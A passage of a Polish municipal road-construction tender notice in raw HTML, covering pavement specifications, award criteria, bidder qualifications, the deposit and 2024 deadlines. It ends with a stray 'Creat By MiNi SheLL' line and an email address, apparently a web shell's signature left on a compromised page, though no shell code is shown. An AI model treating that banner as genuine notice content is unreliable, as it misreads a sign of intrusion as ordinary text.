MPa<br/>9)	Odcinek 9 – drogi gminne nr 170665C Zbytkowo–Chełmica–Zbytkowo oraz nr 170666C Zbytkowo–Zaduszniki<br/>•	ID działek: 040806_2.0035.274, 040806_2.0035.423 <br/>•	Długość 994+183 mb;<br/>•	Szerokość jezdni 4,0 m;<br/>•	Konstrukcja drogi:<br/>	warstwa ścieralna z AC11S wg WT 2 2010 gr. 3 cm;<br/>	warstwa wiążąca z AC11W wg WT 2 2010 gr. 3 cm;<br/>	warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 23 cm;<br/>	warstwa odcinająca z piasku gr. 10 cm.<br/>	sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>•	Konstrukcja zjazdów:<br/>	warstwa ścieralna z AC11S wg WT 2 2010 gr. 3 cm;<br/>	warstwa wiążąca z AC11W wg WT 2 2010 gr. 3 cm;<br/>	warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 23 cm;<br/>	warstwa odcinająca z piasku gr. 10 cm.<br/>	sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>•	Konstrukcja pobocza<br/>	pobocze z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 20cm;<br/>	sprofilowane podłoże gruntowe min E2 = 80 MPa<br/>10)	Odcinek 10 – drogi gminnej w miejscowości Rumunki Głodowskie<br/>•	Działka: 81/6 Obręb Rumunki Głodowskie;<br/>•	Długość 551 mb;<br/>•	Szerokość jezdni 5,0 m;<br/>•	Nawierzchnia jezdni:<br/>	warstwa ścieralna AC 11 S wg WT2 2010r gr.5 cm;<br/>	warstwa wiążąca z AC 11 W wg WT2 2010 gr.7 cm;<br/>	warstwa podbudowy zasadniczej z mieszanki niezwiązanej z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 wg WT 4 2010r E2 ≥100Mpa I0≤2,2 gr.15cm;<br/>	sprofilowane i zagęszczone podłoże gruntowe do G1.<br/>11)	Odcinek 11 – drogi gminnej w miejscowości Rumunki Głodowskie<br/>•	Działka: 123 Obręb Rumunki Głodowskie;<br/>•	Długość 243 mb;<br/>•	Szerokość jezdni 4,0 m;<br/>•	Nawierzchnia jezdni:<br/>	warstwa ścieralna AC 11 S wg WT2 2010r gr.5 cm;<br/>	istniejąca podbudowa.<br/>•	Nawierzchnia zjazdów:<br/>	warstwa ścieralna AC 11 S wg WT2 2010r gr.6 cm;<br/>	podbudowa z KŁSM gr 23 cm;<br/>	warstwa odsączająca gr. 10 cm;<br/>	sprofilowane i zagęszczone podłoże. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował dwoma kryteriami</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu udzielanej gwarancji w miesiącach</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 112 ust. 2 ustawy Pzp dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej: <br/>a)	posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 4 000 000,00 zł,<br/>b)	posiada środki finansowe lub zdolność kredytową na kwotę co najmniej 4 000 000,00 zł.<br/>4)	zdolności technicznej lub zawodowej: <br/>a)	o udzielenie zamówienia może ubiegać się Wykonawca, który wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie roboty budowlane, odpowiadające swoim rodzajem, robotom stanowiącym przedmiot zamówienia, tzn. wykonał co najmniej: dwie roboty budowlaną o wartości nie mniejszej niż 4 000 000,00 zł (brutto) każda, polegającą na budowie, rozbudowie lub przebudowie dróg lub ulic. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, zamawiający żąda następujących podmiotowych środków dowodowych:<br/>1)	oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej Załączniki nr 11 i 12 do SWZ;<br/>2)	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności; <br/>3)	zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>4)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>5)	oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w:<br/>a)	art. 108 ust. 1 pkt 3 ustawy Pzp,<br/>b)	art. 108 ust. 1 pkt 4 Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego<br/>c)	art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d)	art. 108 ust. 1 pkt 6 Pzp,<br/>e)	art. 109 ust. 1 pkt 1 Pzp, odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz.U.2023.70 t.j),<br/>f)	art. 109 ust. 1 pkt 5-8 i 10 Pzp<br/>Wzór oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp stanowi Załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu:<br/>1)	W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących sytuacji ekonomicznej lub finansowej Zamawiający żąda następujących podmiotowych środków dowodowych:<br/>a)	dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia; <br/>b)	informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem;<br/>2)	W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej Zamawiający żąda następujących podmiotowych środków dowodowych:<br/>a)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty Załącznik nr 5 do SWZ;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz ofertowy<br/>2. Do oferty Wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu <br/>3. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa powyżej, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby. Wykonawca może wykorzystać jednolity dokument złożony w odrębnym postępowaniu o udzielenie zamówienia, jeżeli potwierdzi, że informacje w nim zawarte pozostają prawidłowe.<br/>4. Pełnomocnictwo do reprezentowania Wykonawcy – jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej); pełnomocnictwo ustanowione do reprezentowania Wykonawców wspólnie ubiegających się <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający żąda wniesienia wadium w kwocie 80 000,00 zł (osiemdziesiąt tysięcy złotych)<br/>2.	Zgodnie z art. 97 ust. 7 pkt 2-4 Pzp wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Dopuszcza się możliwość zmiany ustaleń niniejszej Umowy w stosunku do treści oferty Wykonawcy w następującym zakresie:<br/>1) zmian wysokości wynagrodzenia Wykonawcy,<br/>a) w przypadku zmiany wysokości stawki podatku od towarów i usług. Wynagrodzenie wykonawcy będzie podlegać zmianie w trakcie obowiązywania umowy w przypadku ustawowej zmiany stawki podatku od towarów i usług i będzie się odnosić wyłącznie do części przedmiotu umowy zrealizowanej, zgodnie z terminami ustalonymi Umową po dniu wejścia w życie przepisów zmieniających stawkę VAT oraz wyłącznie do części przedmiotu umowy, do której zastosowanie znajdzie zmiana stawki podatku od towarów i usług.<br/>b) w przypadku ograniczenia zakresu prac objętych niniejszą Umową w razie stwierdzenia braku konieczności wykonywania części zamówienia, ujętych w SWZ lub zwiększenia zakresu prac, rozliczenie tych prac będzie następować w sposób następujący;<br/>Podstawę obliczenia kosztów zmiany mającej wpływ na wynagrodzenie Wykonawcy stanowić będzie zatwierdzony przez Zamawiającego:<br/>• protokół nadzoru inwestorskiego z którego wynika konieczność wykonania zmiany zatwierdzony przez Zamawiającego;<br/>• kosztorys ofertowy powykonawczy opracowany na podstawie cen jednostkowych lub danych wyjściowych do kosztorysowania przyjętych do sporządzenia kosztorysu Wykonawcy, a w odniesieniu do niewystępujących w kosztorysie Wykonawcy robót, materiałów i sprzętu według cen jednostkowych zaproponowanych przez Wykonawcę, ale nie wyższych<br/>niż średnie ceny SEKOCENBUD dla kwartału poprzedzającego termin wykonania robót budowlanych dla rejonu Kujawsko pomorskiego, a w odniesieniu do materiałów nie występujących ani w kosztorysie ani w SEKOCENBUD, w oparciu o ceny rynkowe jednostkowe tych materiałów z uwzględnieniem cen czynników produkcji (R, M, S, Ko, Z) zastosowanych w<br/>kosztorysie ofertowym wykonawcy;<br/>• w pozostałym zakresie rozliczenie tych robót następować będzie w oparciu o kosztorys powykonawczy wykonawcy uwzględniający rzeczywistą ilość wykonanych robót, przy zastosowaniu ustalonych w kosztorysie ofertowym cen jednostkowych prac, wchodzących w zakres zamówienia podstawowego. Ograniczenie zakresu prac objętych umową nie może przekroczyć 20% wynagrodzenia określonego w paragrafie 12.<br/>c) w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia – szczególne warunki zmiany zostały określone w § 17 „Waloryzacja wynagrodzenia”<br/>2) zmiany terminu realizacji przedmiotu Umowy, gdy jest ona spowodowana:<br/>a) siłą wyższą – rozumianą jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonanie jego zobowiązania w części lub całości, a w szczególności epidemią stwierdzoną przez uprawnione do tego organy lokalne lub państwowe, klęską żywiołową, strajkiem lub stanem wyjątkowym; w szczególności dotyczących pandemii koronawirusa lub innych i podejmowanymi w związku z nią decyzjami przez władze państwowe lub samorządowe lub inne;<br/>b) wystąpienia niekorzystnych warunków atmosferycznych uniemożliwiających prawidłowe wykonanie robót budowlanych<br/>3) zmiany materiałów, przy czym zmiana taka może być spowodowana:<br/>a) niedostępnością na rynku materiałów lub urządzeń wskazanych w dokumentacji, na podstawie której należy wykonać roboty, stanowiącej załącznik do SWZ, spowodowaną:<br/>• zaprzestaniem produkcji;<br/>• udowodnionym, niezawinionym przez Wykonawcę dłuższym terminem ich dostawy na plac budowy;<br/>• wycofaniem z rynku tych materiałów lub urządzeń; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-21 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy zakupowej pod adresem https://platformazakupowa.pl/pn/uglipno</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-21 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-20</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com